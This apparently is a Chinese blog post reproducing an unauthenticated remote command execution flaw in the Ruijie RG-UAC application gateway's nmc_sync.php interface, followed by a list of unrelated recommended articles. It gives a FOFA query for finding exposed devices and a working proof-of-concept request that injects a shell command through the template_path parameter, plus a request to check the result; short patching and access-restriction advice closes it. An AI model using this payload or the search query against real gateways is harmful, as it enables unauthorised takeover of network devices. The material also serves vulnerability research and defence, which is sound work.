锐捷RG-UAC应用网关 前台RCE漏洞复现

0x01 产品简介

锐捷RG-UAC系列应用管理网关是锐捷自主研发的应用管理产品。

0x02 漏洞概述

锐捷RG-UAC应用管理网关 nmc_sync.php 接口处存在命令执行漏洞,未经身份认证的攻击者可执行任意命令控制服务器权限。

0x03 复现环境

FOFA:app="Ruijie-RG-UAC"

0x04 漏洞复现

PoC

复制代码
GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|whoami%20>test.txt|cat HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

验证

复制代码
GET /view/systemConfig/management/test.txt HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

0x05 修复建议

⼚商已发布了漏洞修复程序,请及时关注更新: https://www.ruijie.com.cn

通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。

如⾮必要,禁⽌公⽹访问该系统。

相关推荐
@insist1237 小时前
系统规划与管理师-信息安全规划核心考点解析:概述与安全架构
安全·软考·安全架构·系统规划与管理师·软件水平考试·系统规划与管理工程师
IT小白杨8 小时前
从移动指纹到App隔离:TikTok Shop跨境电商账号安全管理实战
安全·新媒体运营·业界资讯·指纹浏览器
humors2218 小时前
【分享】火绒恶意网址自定义规则,根据互联网应急中心部分威胁预警恶意代码制作
网络·安全·规则·火绒安全·恶意网址·应急中心
工程管理笔记9 小时前
工程发票与资金管理系统:蓝燕云进销项发票台账功能
安全
爱折腾的小黑牛12 小时前
礼账小程序的数据安全方案:加密与备份
数据库·安全
云水一下14 小时前
DVWA从入门到精通(十八):Cryptography(密码学问题)
web安全·密码学·dvwa
humors22114 小时前
【转帖】安全企业发布iOS漏洞攻击风险检测工具
安全·ios·手机·苹果
糖果店的幽灵15 小时前
安全测试从入门到精通 - 环境搭建与基础工具选择
安全·web安全
Joker时代15 小时前
重塑Web3安全防线:Vkey验证器正式登陆安卓与iOS平台,开启数字资产防护新纪元
安全·web3
科技发布15 小时前
有没有安全正规的广告交易平台?推荐传播易APP
安全